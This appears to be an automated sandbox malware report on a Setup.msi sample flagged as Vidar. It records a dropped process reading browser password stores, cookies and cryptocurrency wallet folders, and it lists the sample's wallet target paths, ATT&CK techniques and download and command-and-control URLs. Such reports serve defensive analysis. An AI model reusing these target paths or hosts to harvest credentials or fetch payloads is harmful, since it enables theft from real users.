Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
            Source: Corrections.com, 0000001A.00000002.3001813425.00000000009D0000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *exodus*.*
            Source: Corrections.com, 0000001A.00000002.3001813425.00000000009D0000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *ethereum*.*
            Source: powershell.exe, 00000009.00000002.2107972930.0000017A10075000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Exodus\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\MultiDoge\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Binance\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
            Source: Corrections.com Binary or memory string: WIN_81
            Source: Corrections.com Binary or memory string: WIN_XP
            Source: Appeals.16.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Corrections.com Binary or memory string: WIN_XPe
            Source: Corrections.com Binary or memory string: WIN_VISTA
            Source: Corrections.com Binary or memory string: WIN_7
            Source: Corrections.com Binary or memory string: WIN_8
            Source: Yara match File source: 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: Corrections.com PID: 7808, type: MEMORYSTR

            Remote Access Functionality

            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: Yara match File source: sslproxydump.pcap, type: PCAP
            Source: Yara match File source: 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: Corrections.com PID: 7808, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00FC2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,26_2_00FC2263
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00FC1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,26_2_00FC1C61
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 12 Scripting | 2 Valid Accounts | 1 Windows Management Instrumentation | 12 Scripting | 1 Exploitation for Privilege Escalation | 2 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | 1 Replication Through Removable Media | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 11 Peripheral Device Discovery | Remote Desktop Protocol | 4 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | 2 Valid Accounts | 1 Extra Window Memory Injection | 2 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 21 Input Capture | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Registry Run Keys / Startup Folder | 2 Valid Accounts | 1 DLL Side-Loading | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | 3 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 File Deletion | LSA Secrets | 48 System Information Discovery | SSH | Keylogging | 114 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 12 Process Injection | 1 Extra Window Memory Injection | Cached Domain Credentials | 341 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 232 Masquerading | DCSync | 131 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Valid Accounts | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 131 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 11 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 21 Access Token Manipulation | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 12 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
            Behavior Graph (ID: 1576875, Sample: Setup.msi, Start date: 17/12/2024, Architecture: WINDOWS, Score: 100)

            Source | Detection | Scanner | Label | Link
            Setup.msi | 0% | ReversingLabs | |
            Source | Detection | Scanner | Label | Link
            C:\ProgramData\37QQIEKNGVAA\QQ9RQQ | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exe | 37% | ReversingLabs | Win32.Ransomware.Vidar |
            C:\Users\user\AppData\Local\Temp\628056\Corrections.com | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\MSIAE63.tmp | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\MSIAF01.tmp | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\MSIAF50.tmp | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\MSIAF80.tmp | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\MSIAFB0.tmp | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\MSIB1A5.tmp | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\MSIB1E4.tmp | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\putt.exe | 37% | ReversingLabs | Win32.Ransomware.Vidar |
            C:\Windows\Installer\MSI60C0.tmp | 0% | ReversingLabs | |
            C:\Windows\Installer\MSI614E.tmp | 0% | ReversingLabs | |
            C:\Windows\Installer\MSI619D.tmp | 0% | ReversingLabs | |
            C:\Windows\Installer\MSI64FB.tmp | 0% | ReversingLabs | |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://138.124.60.18 | 0% | Avira URL Cloud | safe |
            http://138.124.60.133/lem.e8 | 0% | Avira URL Cloud | safe |
            http://138.124.60.133/lem.exe | 0% | Avira URL Cloud | safe |
            http://138.124.60.133/lem8 | 0% | Avira URL Cloud | safe |
            http://138.124.60.133/8 | 0% | Avira URL Cloud | safe |
            https://sedone.online.ioming | 0% | Avira URL Cloud | safe |
            http://138.8 | 0% | Avira URL Cloud | safe |
            https://sedone.online/emp | 100% | Avira URL Cloud | malware |
            http://138.124.60.8 | 0% | Avira URL Cloud | safe |
            http://138.124.60.138 | 0% | Avira URL Cloud | safe |
            https://sedone.onlineNGVAA | 0% | Avira URL Cloud | safe |
            http://138.124.60.133/lem.ex8 | 0% | Avira URL Cloud | safe |
            http://138.124.60.133/lem.8 | 0% | Avira URL Cloud | safe |
            http://138.124.60.133/l8 | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            t.me | 149.154.167.99 | true | false | | high
            www.google.com | 142.250.181.100 | true | false | | high
            sedone.online | 116.203.12.114 | true | false | | high
            pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZ | unknown | unknown | false | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://138.124.60.133/lem.exe | false | Avira URL Cloud: safe | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                    http://anglebug.com/7556chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://drive-preprod.corp.google.com/chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://138.124.60.18powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesCorrections.com, 0000001A.00000002.3004996971.00000000039A2000.00000004.00000800.00020000.00000000.sdmp, EKNYUS.26.drfalse
                                                                                                                            high
                                                                                                                            http://138.124.60.8powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://sedone.onlineCorrections.com, 0000001A.00000002.3007890735.000000000412A000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://sedone.online.iomingCorrections.com, 0000001A.00000002.3007890735.000000000412A000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://anglebug.com/6692chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://issuetracker.google.com/258207403chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://138.8powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://anglebug.com/3502chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://anglebug.com/3623chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://sedone.online/empCorrections.com, 0000001A.00000002.3004390803.00000000038DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                        unknown
                                                                                                                                        http://anglebug.com/3625chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://anglebug.com/3624chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://anglebug.com/5007chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://anglebug.com/3862chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://138.124.60.138powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000001D.00000003.2534488464.0000600400D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2538918746.0000600400D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532036292.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532761049.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533336865.0000600400D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533277142.0000600400338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537620059.0000600400338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.ecosia.org/search?q=&addon=opensearchchrome.exe, 0000001D.00000003.2532799851.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557159264.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2581109973.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537282781.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567164223.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://anglebug.com/4836chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://issuetracker.google.com/issues/166475273chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://138.124.60.133/lem8powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://sedone.onlineNGVAACorrections.com, 0000001A.00000002.3007890735.000000000412A000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://138.124.60.133/lem.ex8powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://anglebug.com/4384chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://138.124.60.133/l8powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
